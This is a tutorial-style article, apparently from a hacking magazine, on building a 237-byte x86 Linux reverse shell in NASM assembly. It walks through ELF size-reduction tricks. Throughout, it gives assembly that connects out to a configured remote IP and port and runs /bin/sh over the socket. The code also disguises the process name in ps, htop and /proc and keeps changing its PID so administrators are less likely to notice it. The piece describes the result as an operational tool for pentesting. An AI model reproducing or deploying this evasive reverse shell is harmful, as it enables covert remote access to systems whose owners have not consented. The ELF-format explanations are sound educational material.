Reverse shell of 237 bytes. How to reduce the executable file using Linux hacks

Once I was asked: is it possible to write a reverse shell some 200 bytes in size? This shell should perform the following functions: change its name and PID on a regular basis, make you coffee, and hack the Pentagon… Too bad, this is most likely impossible. But the task seemed interesting and challenging to me. Let’s see whether it can be implemented.

What for?

Plenty of small reverse shells are available on the Internet: tiny shell](https://github.com/creaktive/tsh/blob/master/tsh.c), prism, and others. Reverse shells written in C are only tens to hundreds of kilobytes in size. So, what’s the point to create another one?

The point is simple. This is an educational article: similar to the development of kernel rootkits, which is one of the most intuitive ways to understand the structure of the Linux kernel, writing a reverse shell with additional functionality and restrictions on the executable file size enables you to explore some unexpected Linux features, including those related to ELF files, their loading and execution, resource inheritance in child processes, and linker operations. Along the way, plenty of exciting discoveries and curious hacks await you. And in the end, you will get a bonus: an operational tool that you can additionally refine, polish, and use in pentesting. Let’s start!

info

The resultant program is available on GitHub.

warning

All information provided in this article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication.

Terms of reference

In addition to the connection to a given port on a given host, your reverse shell must support the following functions:

  • set its name at startup (to be less detectable);
  • change the process identifier on a regular basis (to be more elusive); and 
  • be as small as possible (to make your task more interesting).

First, you have to select the language. Since one of your main goals is to reduce the binary size, two options come to mind: C and assembly. Indeed, C makes it possible to create tiny (by modern standards) Hello Worlds (some 17 and ~800 KB for dynamic and static linking, respectively, vs. 2 MB in Go); however, as you probably know, when you compile C code, additional code is generated. This code is responsible for:

  • execution of global constructors and destructors, if any;
  • correct passing of arguments to main(); and 
  • transferring control from __libc_start_main() to main().

Constructors and destructors

Arrays of constructor functions and destructor functions are called before and after main(), respectively. Their code is stored in separate sections – unlike the ‘normal’ code stored in .text. Such functions are used inter alia for various initializations in shared libraries or to set buffering parameters in apps interacting over the network (e.g. in CTF tasks). To ensure that a function falls into one of these sections, you must specify __attribute__ ((constructor)) or __attribute__ ((destructor)) prior to defining the function.

In some cases, the sections storing these functions can be named .ctors/.init/.init_array and .dtors/.fini/.fini_array. Generally speaking, all of them perform the same function, and their differences are irrelevant for the purposes of this article. More information on global constructors and destructors can be found on wiki.osdev.org.

Also, the output executable file may contain sections with debugging and other information (e.g. symbol names, compiler version, etc.); this information isn’t directly required for its execution and operation, but it increases the file size, sometimes significantly. Such sections will be discussed in more detail a little later.

This ‘harness’ is inextricably linked with C binaries (at least in Linux). But for your purposes, this is just ballast to be mercilessly disposed of. Therefore, your reverse shell should be written in the great and terrible assembly language (of course, for x86). The plan is as follows: first, you write operational code and then you start reducing its size.

Coding

I suggest to use NASM. You can take the simplest asm reverse shell as a basis. In my humble opinion, 32-bit code is more preferable: instructions in this mode are shorter, and you don’t lose the required functionality since your primary objective is to connect to the server and run the shell; then the shell will operate in the 64-bit mode.

The code must perform the following operations:

  • at startup, the reverse shell changes its first execution argument (these arguments are displayed in ps, and htop);
  • it also changes the short name (it’s displayed by the top utility);
  • then it tries to connect to the server. If the attempt fails, a child process is created, the parent one terminates, the timeout is waited, and the connection attempt is repeated; and 
  • on successful connection, the shell runs /bin/sh whose stdin, stdout, and stderr are linked with the socket communicating with the server. The process name is spoofed as well.

So, what then is my name to you?

In Linux, there are two ‘entities’ that store the name associated with a process. Let’s call them ‘full’ and ‘short’ names. Both can be accessed via /proc: the full one is in /proc/<pid>/cmdline; while the short one, in /proc/<pid>/comm (comm for command).

According to its description, the short name contains the name of the executable file without the path to it. This name is stored in the kernel structure task_struct describing the process (in kernel terms, task), and its length is limited to 16 characters, including the null byte.

The full name contains the program arguments (i.e. *argv[]): the name of the executable file as it was specified at startup is stored in the zeroth element while the passed arguments (if any), in the rest of the elements.

It’s pretty easy to change the short name. You can use the prctl() system call for this purpose. With prctl(), a process or thread can perform various operations with its name, privileges (capabilities), memory areas, seccomp mode, etc. The number of the required operation is passed as the first argument followed by the rest of the parameters whose number can vary. You are interested in the operation PR_SET_NAME where the pointer to the new name is passed as the second argument. However, if the name, including the null byte, is longer than 16 characters, it will be truncated.

In other words, to change the short name, you have to call prctl(PR_SET_NAME, NEW_ARGV) where NEW_ARGV contains the new name’s address. Execute the following code:

mov eax, 0xac ; NR_PRCTL
mov ebx, 15 ; PR_SET_NAME
mov ecx, NEW_ARGV
int 0x80 ; syscall interrupt
...
NEW_ARGV:
db "s0l3g1t", 0

info

Plenty of useful information about system calls can be found in man 2 syscall. It also contains two tables for platforms and ABIs supported by Linux; they store instructions for system calls and registers used to pass arguments and return values. Note that the calling conventions are different from those used in usermode apps (at least on x86).

Now you can rewrite argv[0]. The following piece of code performs operations similar to strncpy(&argv[0], NEW_ARGV, strlen(argv[0] + 1)) in C (the address of argv[0] was already pushed onto the stack):

mov edi, [esp] ; edi = &argv[0]
mov esi, NEW_ARGV
mov ecx, _start - NEW_ARGV ; ecx = strlen(NEW_ARGV) + NULL-byte
_name_loop:
movsb ; edi[i] = esi[i] ; i+=1
loop _name_loop
...
NEW_ARGV:
db "s0l3g1t", 0
_start:
...

This address is placed in edi (destination index register). The address of the name you set ("s0l3g1t") is placed in esi (source index register); while its length, including the null byte, in ecx. However, it turns out that if the original argv[0] ("./asm_shell") was longer than the new one, then, despite the presence of the terminating null byte, the ps output will be as follows.

ps output when a null argument is overwritten
ps output when a null argument is overwritten ‘explicitly’

That’s not good. Let’s try to fill it with zeros first and then overwrite.

ps output when a zeroed null argument is overwritten
ps output when a zeroed null argument is overwritten

That’s better: the ps output contains nothing suspicious! But there is still some room for improvement. What does the manual say? According to man 5 proc (subsection /proc/[pid]/cmdline):

Furthermore, a process may change the memory location that this file refers via prctl(2) operations such as PR_SET_MM_ARG_START.

In addition to thePR_SET_MM_ARG_START parameter, man 2 prctl contains PR_SET_MM_ARG_END (these options are available starting from Linux 3.5). It seems that the second parameter is exactly what you need! Too bad: to perform prctl() operations affecting the process memory, you need the CAP_SYS_RESOURCE privilege (otherwise it would be too easy!). And to grant it, superuser rights are required…

For the same reason, if you ‘explicitly’ replace the address of the argv[]string array on the stack, this won’t change the contents of /proc/[pid]/cmdline: Linux stores addresses of the beginning and end of the memory region storing the process arguments, and the content of this particular memory region is displayed. The same is true for environment variables as well. Therefore, xxd displays zeros.

Let’s assume that your reverse shell is always run on behalf of a regular user, and there is no way to grant the CAP_SYS_RESOURCE privilege to it. Therefore, you simply fill the entire original argv[0] with zeroes and then overwrite it with your own one. How often does one check the process name in /proc using xxd?

Now all you have to do is find out how to spoof the name /bin/sh (because after calling execve() to run the shell, its *argv[] will show /bin/sh to the admin in the ps and htop outputs and in /proc/<pid>/cmdline). Fortunately, this problem is easy to solve: you just pass your own argv[0] to this syscall as the second argument. Keep in mind that the passed pointer points to an array of arguments (strings) that must be terminated with a null pointer. Therefore, before pushing the NEW_ARGV address onto the stack, 0 must be pushed there:

xor eax, eax
push dword 0x0068732f ; push "/sh"
push dword 0x6e69622f ; push /bin (="/bin/sh")
mov ebx, esp ; ebx = ptr to "/bin/sh" into ebx
push edx ; edx = 0x00000000
mov edx, esp ; **envp = edx = ptr to NULL address
push ebx ; pointer to /bin/sh
push 0
push NEW_ARGV
mov ecx, esp ; ecx points to shell's argv[0] ( &NEW_ARGV )
mov al, 0xb
int 0x80 ; execve("/bin/sh", &{ NEW_ARGV, 0 }, 0)

But now you cannot change the short name with prctl() since you are working from a shell where syscalls cannot be made directly. However, there are other interesting ways to do this.

Starting over

To connect to a server, you have to create a socket, fill the struct sockaddr structure containing the address to connect to, and connect to it.

A socket is the connection endpoint in Linux; unlike unix and netlink sockets, this is not necessarily a network connection. When you create a socket, you must specify the address family or the protocol family (currently, the first one contains aliases of the second one) it will belong to, the socket type (streaming, datagram, raw, etc.), and the protocol (it depends on the family, see man protocols). In this particular case, you need a stream (TCP, SOCK_STREAM) internet socket (the AF_INET family), and the protocol will be selected automatically when you pass 0:

mov al, 0x66 ; 0x66 = 102 = socketcall()
push ebx ; 3rd arg: socket protocol = 0
mov bl, 0x1 ; ebx = 1 = socket() function
push byte 0x1 ; 2nd arg: socket type = 1 (SOCK_STREAM)
push byte 0x2 ; 1st arg: socket domain = 2 (AF_INET)
mov ecx, esp ; copy stack structure's address to ecx (pointer)
int 0x80 ; eax = socket(AF_INET, SOCK_STREAM, 0)

info

On some platforms, including, x86_32, a single system call socketcall() is used for socket functions instead of separate syscalls socket(), bind(), connect(), etc.; its first argument is the number of the required function. These numbers are defined in the Linux kernel.

The struct sockaddr parameter is a kind of ‘base class’ for definitions of various protocols’ addresses. It has only two fields:

/* Structure describing a generic socket address. */
struct sockaddr {
unsigned short sa_family; /* Common data: address family and length. */
char sa_data[14]; /* Address data. */
};

The value of the first field must match the family of the previously created socket. The second field describes the address the socket will be associated with. As you know, different protocols have different address formats, including sockaddr_in/sockaddr_in6 (internet sockets), sockaddr_un (unix sockets), etc. But all of them are a kind of wrappers for the sockaddr structure and can be easily cast to the sockaddr type to support a single API for socket functions. For instance, sockaddr_in divides the sa_data field into an IP address and a port number, thus, leaving eight unused bytes (see also man 7 ip):

struct sockaddr_in {
sa_family_t sin_family; /* address family: AF_INET */
in_port_t sin_port; /* port in network byte order */
struct in_addr sin_addr; /* internet address */
unsigned char sin_zero[8]; /* Pad to size of 'struct sockaddr' */
};
/* Internet address */
struct in_addr {
uint32_t s_addr; /* address in network byte order */
};

Your objective is to correctly form this structure on the stack and pass its address to the connect() system call. As said above, the port (REV_PORT) and the IP address (REV_IP) in this structure must have the network byte order (i.e. Big Endian (MSB)). The below code calls connect(socketfd, addr, sizeof(addr)) where socketfd was obtained earlier:

mov al, 0x66 ; 0x66 = 102 = socketcall()
push dword REV_IP ; Remote IP address
push word REV_PORT ; Remote port
push word 0x0002 ; sin_family = 2 (AF_INET)
mov ecx, esp ; ecx = ptr to *addr structure
push byte 16 ; addr_len = 16 (structure size)
push ecx ; push ptr of args structure
push ebx ; ebx = socketfd
mov bl, 0x3 ; ebx = 3 = connect()
mov ecx, esp ; save esp into ecx, points to socketfd
int 0x80 ; eax = connect(socketfd, *addr[2, PORT, IP], 16) = 0 on success

If the connection attempt fails, the reverse shell should try again after a while. This is simple: you check the return code received in eax; in case of a successful connection, it’s 0; in case of an error, it’s 1. Prior to a new connection attempt, the reverse shell must create a child process and terminate the parent process so that its PID changes. Important: it’s the child process that will sleep. For simplicity purpose, you can set the timeout to five seconds (although a random value varying in a certain range would be better).

Setting up the sleep function requires some time and effort. You cannot just call sleep(5) because the syscall you need takes two pointers to structures: the first one describes the sleep duration, while the second one records the remaining time if the sleep was interrupted (e.g. by an incoming signal):

int nanosleep(const struct timespec *req, struct timespec *rem)

However, the manual claims that rem can be equal to NULL, which is good. All you have to do is write to the req structure the seconds and nanoseconds during which the function should sleep:

struct timespec {
time_t tv_sec; /* goes to 'long int' */
long tv_nsec;
};

Both numbers belong to the long int type that occupies 4 bytes on x86_32. So, you have to fill the structure and make the syscall as shown below (and clean up the stack afterwards):

mov eax, NR_NANOSLEEP
push dword 0 ; nsec
push dword 2 ; sec
mov ebx, esp ; ebx = struct timespec *req
xor ecx, ecx ; ecx = struct timespec *rem = NULL
int 0x80
add esp, 8 ; cleanup

The output should be as follows.

Sleeping, changing name, never giving up!
Sleeping, changing name, never giving up!

Diet for an elf

Congrats! You’ve got an operational reverse shell! What’s its size? If you build the binary using nasm -f elf32 asm_shell.asm -o asm_shell.o && ld asm_shell.o -o asm_shell -m elf_i386, it will be some 5 KB.

5 KB... Is this a lot or a little?
5 KB… Is this a lot or a little?

info

This article is largely inspired by a study with a self-explanatory second name: Size Is Everything (also available on GitHub). The idea is to get rid of everything unnecessary in an ELF file, examine the ELF file format and Linux internals, and finally get an operational binary. This file does nothing, only returns the code “42”. Spoiler: the author managed to squeeze it to 45 bytes from the initial 4 KB!

So, your shell is currently 4912 bytes in size. Time to examine its ‘elven’ nature.

Building a tiny elf

Any hacker pentester familiar with C is aware that programs written in this language start with main() since gcc expects this function to be in the code. In fact, it’s not quite so: the execution of an executable file starts from the entry point, and this is usually the _start() function responsible for the preliminary preparation and transfer of control to main().

You assemble the .asm file using NASM, and it produces a ‘Relocatable’ ELF file (normally, such files have the .o extension). ELF files are produced when a project is assembled from several source files according to the scheme “one source – one relocatable elf” (by the way, they can be written in more than one language).

Relocatable ELF files contain sections with data and code that can be linked against other files to create an executable binary. Actually, this is what the linker does. In this particular case, this is ld. It expects a function named _start to be present in one of the input files to make it the entry point.

A hollow inside

After executing the above commands, you get a file where the code (section .text) starts with a physical offset (offset in the file on disk) of 0x1000. This suspiciously resembles the page size, and before it, there is only a space filled with zeros. By the way, this piece of code occupies as much as 4 KB, which is totally unacceptable!

In the beginning was the Matrix
In the beginning was the Matrix

Let’s see what linker options are responsible for this. Based on the description of the -n key (Do not page align data), this is exactly what you need.

Removing page alignment
Removing page alignment

912 bytes! Much better. The code now starts with a physical offset of 0x60. What’s next? Time has come to play with the sections.

info

You can review the history of commits to examine the source code at different development stages.

Who needs those SHTs?

SHT is a Section Header Table (although more often you can find just a “section table” or “section headers”). It contains the names of all sections in the file, and you can view them by running readelf -S.

Sections of your reverse shell
Sections of your reverse shell

Where do the other sections come from taking that the source code had only the .text section? Remember how the executable file was assembled. For instance, to enable ld to find the _start(), function, information about it must be present somewhere. It’s stored in the symbol table, in the .o file, in the .symtab and .strtab sections.

Information about symbols in the relocatable elf
Information about symbols in the relocatable elf

As you can see, all your labels specified in the source code are present there. But an executable file doesn’t necessarily have to contain a symbol table. Therefore, you can apply the strip command to it or use the linker key -s to get rid of the symbols in it. However, if you ‘strip’ symbols in a relocatable file, the linker won’t be able to find the entry point and assemble an executable elf, which is logical. Overall, this trick allows to reduce the size by a little more than half (to be specific, by 468 bytes).

Reverse shell without information about symbols
Reverse shell without information about symbols

Moreover, the correct operation of a binary doesn’t require the information about its sections at all! The most straightforward way to remove them from the executable file is to use the command dd if=./asm_shell of=./asm_shell_trunc bs=1 count=<N>. Fortunately, the section table is located at the end of the file, so this operation isn’t difficult. In this particular case, it starts at offset 0x130 (304).

Preparing the file to a surgery
Preparing the file to a surgery

But to get rid of the information indicating that there were sections in the file, you should not only cut off the SHT at the end of it, but also fill the fields in the ELF file header containing the offset of the section table, the size of its records, and their number (e_shoff, e_shentsize, and e_shnum in ElfN_Ehdr, respectively) with zeroes. In the above screenshot, these fields are underlined. For detailed instructions on how to get rid of section headers, see the article ELF – No Section Header? No Problem; also see the Oracle blog for more information about the sections.

info

The structure of an ELF header is shown in this diagram. I strongly recommend to review it if you have read this far. Just keep in mind that it depicts a 32-bit ELF, and the sizes of individual fields in it are smaller than in a 64-bit one.

Now your reverse shell is 304 bytes in size. Is it possible to reduce it further?

‘Compressing’ instructions

This trick is well-known to hackers pentesters who have to write shellcodes for buffers with a limited size. The point is that different instructions on x86 have different lengths, and the same thing can often be expressed in the assembly language in different ways. Below is one of my favorite examples.

Three bytes vs. seven bytes
Three bytes vs. seven bytes

Review your code from this perspective. Of course, its readability will most likely deteriorate, but this won’t affect the shell’s workability in any way! First of all, don’t write small numbers directly into registers. In this particular case, these are mostly system call numbers.

Wasted space
Wasted space

Replacing instructions like mov REG, IMM with push IMM; pop REG will really help with syscalls having small numbers; however, for numbers greater than 0x7f, push IMM will take 5 bytes instead of two, and one more byte is used by pop REG. As you can see, offsets in the reverse shell are much greater than this value; therefore, if you try to save on them this way, you would lose more than you gain. In some cases, instead of placing 1 into the register directly, you can simply increment it (important: don’t forget to set it to zero it first). Just compare!

Placing 1 into ebx
Placing 1 into ebx

Also, you don’t need some of the register initialization instructions because initially they are all set to zero. The specific values of nanoseconds spent on sleep and the exit code for unsuccessful connection attempts can be neglected and removed, too. The way you push the sockaddr_in structure onto the stack can also be reduced in size: instead of using two separate instructions for the address family and port number (that in total occupy 4 bytes in the structure), you can push them onto the stack at once.

As a result, the code shrinks by additional 25 bytes; now its size is 279 bytes. Its further reduction requires creativity and patience.

Bonus: sploiting headers

An ELF header includes a space filled by default with zeros, and the system doesn’t check these values ​​when the file is loaded and executed (although certain tools do this). This space is located in the very first line, e_ident, and starts at the tenth byte (EI_PAD). The ninth byte, EI_ABIVERSION, that describes the ABI version for object files is irrelevant for you since your shellcode isn’t written for the ARM architecture. Therefore, you can safely use 8 bytes starting from the eighth one in the file. This is just enough for"/bin/sh". But how to correctly specify the offset to it in the code without calculating or changing it manually?

The answer is: you have to change the build parameters. Since you are going to edit the ELF header generated by the linker, you cannot use it. For such situations, NASM allows to specify the ‘raw’ format of the output file: nasm -f bin asm_shell.asm -o asm_shell.raw. Then it builds the file as defined in the source code, without adding any headers to it. You have to specify the address where this stuff should be loaded so that NASM can correctly calculate the entry point and other offsets. For this purpose, the org 0x08048000 directive is specified.

There is one more thing that you can change without hampering the binary’s workability: the previously zeroed information about the section table. The ELF header contains the following fields in a row:

  • e_shoff, e_flags (8 bytes)
  • e_shentsize, e_shnum, e_shstrndx (6 bytes)

The e_flags field does not describe SHT; according to the documentation, it’s intended for certain processor flags. But since none of them are currently defined, you can safely use 8 bytes from the first chain of fields. NEW_ARGV will perfectly fit there.

The second chain can be used to store the code that terminates the process in case of an unsuccessful connection (it occupies 5 bytes); while jmp _exit can be put in its original place, thus, saving 3 more bytes. Your manually assembled header now looks as follows:

org 0x08048000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF" ; e_ident
db 1, 1, 1, 0
BIN_SH:
db "/bin/sh", 0
e_type:
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
NEW_ARGV:
db "s0l3git", 0 ; e_shoff, e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
_exit:
push NR_EXIT ; e_shentsize
pop eax ; e_shnum
; exit_code = random :D ; e_shstrndx
int 0x80
db 0
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 5 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
...

After all these manipulations, the binary is 254 bytes in size. What else can be done? For instance, you can try to make the ELF header and the Program Header Table overlap (as suggested in the above-mentioned article “Size Is Everything”). This is possible because the last 8 bytes of the ELF header are identical to the first 8 bytes of the PHT, while the overlapped ELF bytes with new values ​​are not critical for the file execution. But in this case, you will have to return the _exit code put previously in the header to its original place. After playing a bit with registers, you get a reverse shell 237 bytes in size. This is roughly one twentieth of its original size!

Here it is
Here it is

Lessons learnt

First, a reverse shell can be ridiculously tiny if necessary. Second, 32-bit processes can execute execve() and become 64-bit ones. Headers in ELF files can overlap; if it’s done properly, the file will work just fine. And if a process changes its name, it may leave traces.

Your reverse shell is fully operational, and you can add more functionality to it. For instance, teach the shell to ignore signals, scan ports, encrypt traffic… But that’s another story. Good luck in your endeavors!


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>